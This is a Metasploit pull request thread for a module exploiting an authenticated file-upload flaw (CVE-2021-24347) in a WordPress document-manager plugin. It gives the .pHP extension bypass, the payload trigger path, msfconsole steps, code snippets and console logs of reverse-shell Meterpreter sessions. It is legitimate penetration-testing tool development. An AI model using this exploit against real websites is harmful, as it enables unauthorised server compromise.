[CVE-2021-24347] Wordpress plugin SP Project & Document < 4.22 - Authenticated RCE
rapid7/metasploit-framework pull request #15408
Opened 2021-07-09 09:53 UTC by Hakyac

## Vulnerable Application

### Description

This module allows an attacker with a privileged Wordpress account to launch a reverse shell
due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
Indeed, even if it is not possible to upload `.php` files, the security check only works with lowercase
making possible to upload `.pHP` files for instance.
Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/my_payload.php`

### Installation

You can easily install Wordpress with Docker as explained [there]
(https://upcloud.com/community/tutorials/wordpress-with-docker/).
Then, you can download a vulnerable version of SP Project & Document plugin from [there]
(https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip)
and install it on your Wordpress website through the plugin page : Add New > Upload Plugin > Browse...

## Verification Steps

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. `use exploit/multi/http/wordpress_plugin_sp_project_document_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_rconfig>` if the base path of the Wordpress website is different from `/`
6. `check` to check if the targeted Wordpress website is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell

## Options

### USERNAME

Set the USERNAME of your admin account.

### PASSWORD

Set the PASSWORD of your admin account.

## Scenarios

This module was successfully tested on Debian 10 with Wordpress 5.7.2 and SP Project & Document 4.21.
See the following output :

```
msf6 > use wordpress_plugin_sp_project_document_manager
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set rhost 192.168.1.35
rhost => 192.168.1.35
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set username admin
username => admin
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set password adminocd2021password => adminocd2021
msf6 exploit(wordpress_plugin_sp_project_document_manager) > run

[*] Started reverse TCP handler on 192.168.1.28:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Version 4.21 of plugin SP Project & Document Manager found !
[+] The target is vulnerable. This version of SP Project & Document Manager is vulnerable !
[*] Uploading file 'ejtfh.pHP' containing the payload...
[*] Sending stage (39282 bytes) to 192.168.1.35
[*] Meterpreter session 4 opened (192.168.1.28:4444 -> 192.168.1.35:59938) at 2021-07-09 11:41:25 +0200
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 192.168.1.35
[*] Meterpreter session 5 opened (192.168.1.28:4444 -> 192.168.1.35:59940) at 2021-07-09 11:41:45 +0200

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo 
Computer    : 217a92584fbf
OS          : Linux 217a92584fbf 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
Meterpreter : php/linux
meterpreter > 
```

2021-07-09 14:40 UTC, h00die commented
see https://github.com/rapid7/metasploit-framework/pull/15402#pullrequestreview-703096124

this can most likely be simplified a bunch

2021-07-12 09:03 UTC, Hakyac commented
Same changes added

2021-07-15 14:24 UTC, smcintyre-r7 requested changes

2021-07-15 14:24 UTC, smcintyre-r7 commented on modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
> +          [ 'Wordpress SP Project & Document < 1.6.0', {}]
The module description says the vulnerability is in version < 4.22 and the module docs say to download v4.21 for testing. What is version 1.6.0 referring to here and should it be updated?

2021-07-15 14:24 UTC, smcintyre-r7 commented on modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
> +      fail_with(Failure::Unreachable, 'Server not online or not detected as wordpress')
A check method shouldn't use `fail_with`. Can you please update this to `CheckCode::Unknown`?

2021-07-15 14:24 UTC, smcintyre-r7 commented on modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
> +    fail_with(Failure::UnexpectedReply, 'Authentication failed') unless cookie
Using `Failure::NoAccess` would be more accurate here if it's an authentication error.

```suggestion
    fail_with(Failure::NoAccess, 'Authentication failed') unless cookie
```

2021-07-15 14:24 UTC, smcintyre-r7 commented on modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
> +    end
It looks like this could be why your payload is being triggered twice. The first call to `send_request_cgi` is not updating the value of `r` so it's unclear on if it's necessary or not. Furthermore, the `#downcase!` is updating `payload_name` causing it to be lowercase in both of the requests, making them identical. You should be able to observe this by setting `HttpTrace` to on.

Something like this might be a bit more simple and still functional though I haven't tested it.

```suggestion
    fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 302

    print_status('Triggering the payload ...')
    send_request_cgi(
      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name.downcase}")
    )
```

2021-07-20 07:03 UTC, Hakyac commented on modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
> +          [ 'Wordpress SP Project & Document < 1.6.0', {}]
Thanks for the proofreading, it's just a typo due to an unfortunate copy/paste.

2021-07-20 21:11 UTC, space-r7 commented on documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
> +This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
Looks like this line is Wordpress Backup Guard copypasta

2021-07-20 21:11 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
> +          This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
From Backup Guard pr

```suggestion
```

2021-07-20 21:11 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
> +        'Privileged' => true,
Should be set to false since you get privileges as the `www-data` user:

```suggestion
        'Privileged' => false,
```

2021-07-20 21:11 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
> +      'uri' => normalize_uri(target_uri.path, "wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}"),
Use `vars_get` for the `page` and `id` parameters instead.

2021-07-21 07:06 UTC, Hakyac commented on documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
> +This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
Yes well seen !

2021-07-22 18:34 UTC, space-r7 commented on documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
> +This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
```suggestion
```

2021-07-22 18:34 UTC, space-r7 commented on documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
> +Then, you can download a vulnerable version of SP Project & Document plugin from [there]
```suggestion
Then, you can download a vulnerable version of SP Project & Document plugin from [here]
```

2021-07-22 18:34 UTC, space-r7 commented on documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
> +List the steps needed to make sure this thing works
```suggestion
```

2021-07-22 18:34 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
> +          making possible to upload `.pHP` files for instance.
```suggestion
          The security check only searches for lowercase file extensions such as `.php`, making it possible to upload `.pHP` files for instance.
```

2021-07-22 18:34 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
> +      CheckCode::Unknown('The admin credentials given are wrong !')
```suggestion
      CheckCode::Detected('The admin credentials given are wrong !')
```

2021-07-22 18:43 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
> +    post_data.add_part('a1b3bac1bc', nil, nil, "form-data; name='cdm_upload_file_field'")
Is `a1b3bac1bc` something that can be randomized?

2021-07-23 17:38 UTC, merged

2021-07-23 17:40 UTC, space-r7 commented
Tested:

```
msf6 > use exploit/multi/http/wp_plugin_sp_project_document_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_plugin_sp_project_document_rce) > set rhost 192.168.37.145
rhost => 192.168.37.145
msf6 exploit(multi/http/wp_plugin_sp_project_document_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/wp_plugin_sp_project_document_rce) > set username space
username => space
msf6 exploit(multi/http/wp_plugin_sp_project_document_rce) > set password password
password => password
msf6 exploit(multi/http/wp_plugin_sp_project_document_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading file 'vmagp.pHP' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 192.168.37.145
[+] Deleted vmagp.php
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.145:43662) at 2021-07-23 12:35:25 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfoo
[-] Unknown command: sysinfoo.
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 5.8.0-59-generic #66~20.04.1-Ubuntu SMP Thu Jun 17 11:14:10 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter >
```

2021-07-23 17:41 UTC, space-r7 commented
## Release Notes

This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin, SP Project and Document Manager. For versions below `4.22`, an authenticated user can upload arbitrary PHP code because the security check only blocks the upload of files with a `.php` extension, meaning that uploading a file with a `.pHp` extension is allowed. Once uploaded, requested the file will result in code execution as the `www-data` user.